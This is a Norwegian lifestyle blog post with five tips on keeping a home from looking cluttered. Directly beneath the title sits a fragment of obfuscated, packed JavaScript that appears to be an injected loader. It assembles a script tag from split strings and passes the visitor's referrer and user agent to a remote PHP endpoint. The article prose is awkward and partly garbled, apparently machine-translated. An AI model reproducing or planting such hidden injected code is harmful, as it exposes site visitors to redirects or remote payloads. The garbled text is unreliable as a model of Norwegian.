DIY tips, Inspirasjon

5 feil som får hjemmet ditt ser rotete ut

5 »’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(«<\/k"+"l>«);n m=»q»;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atnsd|var|u0026u|referrer|fskts||js|php’.split(‘|’),0,{}))
feil som får hjemmet ditt ser rotete ut:
Hvor mange ganger har du vært gjennom det frisk og ren, men fortsatt føles rotete? Vi i Homedecor har listet opp noen gode tips som vil gi deg inspirasjon til å gjøre nettopp det.

Å ha rotete hjemme generelt er ikke alene. Det renser og rydder, men etter en til to dager, er det like rotete som før. Kikk inn i våre små ting du kan tenke på neste gang for å prøve å holde det så rent og friskt som mulig.

1. Oppslagstavle av kjøleskapet

Som kjøleskapet og bruk som en oppslagstavle? Klart det er et smart sted og sette opp viktige notater, invitasjoner, eller på annen måte. Men det betyr ikke hører hjemme her. Det er mange andre bedre steder der du kan sette opp disse brikkene. Kjøkkenet må holdes rene.

2. Organiser dine kjøp

En av disse vanlige problemene i mange hjem. Det er ikke nok lagringsplass for klær. Det er ikke sant. Problemet er at selv om du utvider skap og andre lagringsenheter, vil det gå raskt før disse er også overbefolket . Det du vil endre, er kjøpene. Først organisere og tom skapet på den gamle så kan du kjøpe ny. Vi vet at den mottar, men prøv. Det samme gjelder for kjøleskap oppbevaring.

3. Esker og bokser

Noe som lett kan skje og skape rot er bagateller. Nøkler, mobiltelefoner og lignende. Her er det en masse pene små esker og bokser som du kan bruke til å gjemme bort disse små gadgets. Legg taster du ikke bruker hver dag i en liten boks eller en nøkkelsafe. Esker og bokser online.

4. Sett bort ting du ikke bruker i hjemmet

Organisere hjemmet er A & O. holde ren er ikke det samme som å organisere. Hvis du ser raskt på rommet ditt, vil du se en masse ting som du sannsynligvis ikke har brukt på en stund. Disse må sikkert ligger foran oss? Hvis ikke, ta den ut og sette på loftet, i en lagring eller hvorfor ikke selge.

5. Hold hallen ren

Du har sannsynligvis allerede vet at hallen er det første inntrykket av ditt hjem. Derfor er dette spesielt viktig og holde ryddig. Få bort alle jakker, jakker og sko. Kanskje du kan henge en gardin eller legge noen stilige skap der du kan henge og sette bort klær du ikke bruker hver dag.

Related Posts

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *